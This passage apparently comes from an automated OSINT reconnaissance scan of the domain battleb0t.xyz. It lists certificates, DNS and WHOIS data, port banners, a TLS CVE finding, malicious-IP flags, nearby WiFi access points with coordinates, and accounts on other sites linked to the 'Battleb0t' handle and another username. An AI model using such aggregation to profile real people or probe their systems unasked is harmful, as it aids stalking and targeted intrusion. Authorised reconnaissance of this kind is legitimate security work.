c0:c4:e2:28:fe:cc:ba:5c:25:d8:86:52:ce:0d:c5:7f:e7:b5:
d9:3e:e1:65:14:17:4f:8c:55:fc:01:58:43:fe:c7:c5:4b:26:
e2:ea:0b:c9:ff:2c:52:b5:ab:00:e9:06:49:51:c2:01:ca:b5:
6a:c4:ae:a2:17:c3:86:ec:ec:a7:72:a4:4e:b6:4e:3e:d9:0b:
df:8f:84:de:6a:96:ce:0d:8d:26:ac:b2:5c:45:1f:a0:e5:df:
88:dd:84:9f:fe:46:1e:e9:a2:91:bb:ae:08:4d:ff:a2:51:db:
43:d0:e5:a3:df:91:dd:52:a9:23:85:54:e1:34:57:f4:c7:f8:
24:6b:63:ba
| battleb0t.xyz |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.68): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx1 (Net ID: 00:02:2D:A8:7E:D5) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 221.30.196.104.bc.googleusercontent.com | 104.196.30.221 |
| 2023-05-12 02:44:09 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:82:E0:7E:5D:05:40:34:18:F6:30:F7:
09:CD:BC:FE:2C:13:EB:90:30:CE:10:ED:E8:A7:9D:A3:
74:75:12:5B:72:02:20:5D:1F:9D:87:56:AA:F7:6D:9A:
04:0D:4A:7B:35:DE:90:29:A5:D4:16:A7:8F:DF:FE:37:
AB:35:8B:24:23:B9:2B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:13:FF:00:36:A8:61:87:48:A6:6A:04:09:
BC:E3:3E:AA:13:E7:46:3D:06:75:68:23:18:E7:6A:45:
49:F7:30:F1:02:20:3F:F4:9C:8A:E6:46:D3:65:F6:98:
13:BF:9A:20:D3:DA:10:A9:E3:2E:5D:DA:C7:3B:14:4E:
4F:4E:1C:82:A5:B3
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:46:49 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=GB,ST=Greater Manchester,L=Salford,O=Sectigo Limited,CN=Sectigo RSA Domain Validation Secure Server CA | 64.226.81.43 |
| 2023-05-12 02:53:45 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8002::153 |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.111): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://fluid.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.219): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DCO (Net ID: 00:0C:41:66:5E:C3) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Greece | expressdryclean.gr |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/Battleb0t | Battleb0t |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Chomikuj.pl (Category: misc)
https://chomikuj.pl/dawidsulej/ | dawidsulej |
| 2023-05-12 03:08:29 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.109.153 |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 111.48.229.35.bc.googleusercontent.com | 35.229.48.111 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | friday28 (Net ID: 00:06:25:BF:BB:2F) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | U+Net (Net ID: 00:02:A8:81:E3:25) | 50.1188, 8.6843 |
| 2023-05-12 03:11:16 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2a06:98c1:3120::1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:66:AA:84) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:48 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06G1PB5R3RGDWCWXWQ2TAMN
Date: <REDACTED>
Content-Length: 0
| 34.148.97.127 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ikizler (Net ID: 00:12:BF:32:87:51) | 40.2024, 29.0398 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:64:DA:1A) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitecgameuser (Net ID: 00:01:8E:15:D4:A7) | 37.780462,-122.390564 |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00-duino.github.io |
| 2023-05-12 02:44:15 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: ecdsa-with-SHA384
| funny.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | vapor (Net ID: 00:02:2D:09:FB:FD) | 37.780462,-122.390564 |
| 2023-05-12 02:53:22 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3030::ac43:a8fc | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:92:53:2C) | 41.8781, -87.6298 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_5.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | studiobleu (Net ID: 00:0C:41:86:C7:5C) | 39.0469, -77.4903 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FOX (Net ID: 00:01:71:0C:5D:4A) | 52.3759, 4.8975 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8003::153 | battleb0t.xyz |
| 2023-05-12 02:45:48 | Internet Name | No | VirusTotal | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | kekw.battleb0t.xyz |
| 2023-05-12 02:53:01 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [34.148.97.127]
https://www.virustotal.com/en/ip-address/34.148.97.127/information/ | 34.148.97.127 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pokec (Category: social)
https://pokec.azet.sk/login | login |
| 2023-05-12 02:55:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.109.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | rsi (Category: gaming)
https://robertsspaceindustries.com/citizens/login | login |
| 2023-05-12 03:17:36 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: AHU.XYZ
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40.0Z
Creation Date: 2020-08-10T01:10:12.0Z
Registry Expiry Date: 2026-08-10T23:59:59.0Z
Registrar: Google Inc
Registrar IANA ID: 895
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.2065311374
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ahu.xyz
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40Z
Creation Date: 2020-08-10T01:10:12Z
Registrar Registration Expiration Date: 2026-08-10T23:59:59Z
Registrar: Google LLC
Registrar IANA ID: 895
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.8772376466
Domain Status: serverTransferProhibited https://www.icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: go663216313251
Registrant Name: Contact Privacy Inc. Customer 7151571251
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant Street: 96 Mowat Ave
Registrant City: Toronto
Registrant State/Province: ON
Registrant Postal Code: M4K 3K1
Registrant Country: CA
Registrant Phone: +1.4165385487
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Admin ID: go663216313251
Admin Name: Contact Privacy Inc. Customer 7151571251
Admin Organization: Contact Privacy Inc. Customer 7151571251
Admin Street: 96 Mowat Ave
Admin City: Toronto
Admin State/Province: ON
Admin Postal Code: M4K 3K1
Admin Country: CA
Admin Phone: +1.4165385487
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Tech ID: go663216313251
Tech Name: Contact Privacy Inc. Customer 7151571251
Tech Organization: Contact Privacy Inc. Customer 7151571251
Tech Street: 96 Mowat Ave
Tech City: Toronto
Tech State/Province: ON
Tech Postal Code: M4K 3K1
Tech Country: CA
Tech Phone: +1.4165385487
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:16:36.418919Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
Please register your domains at: https://domains.google.com/
This data is provided by Google for information purposes, and to assist
persons obtaining information about or related to domain name registration
records. Google does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data only for
lawful purposes and that, under no circumstances, will you use this data to:
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail (spam); or
2) enable high volume, automated, electronic processes that apply to this
WHOIS server.
These terms may be changed without prior notice.
By submitting this query, you agree to abide by this policy.
| ahu.xyz |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55154FA6D (Net ID: 00:01:E3:54:FA:6D) | 52.3759, 4.8975 |
| 2023-05-12 02:56:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.eleuzina.sk/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; 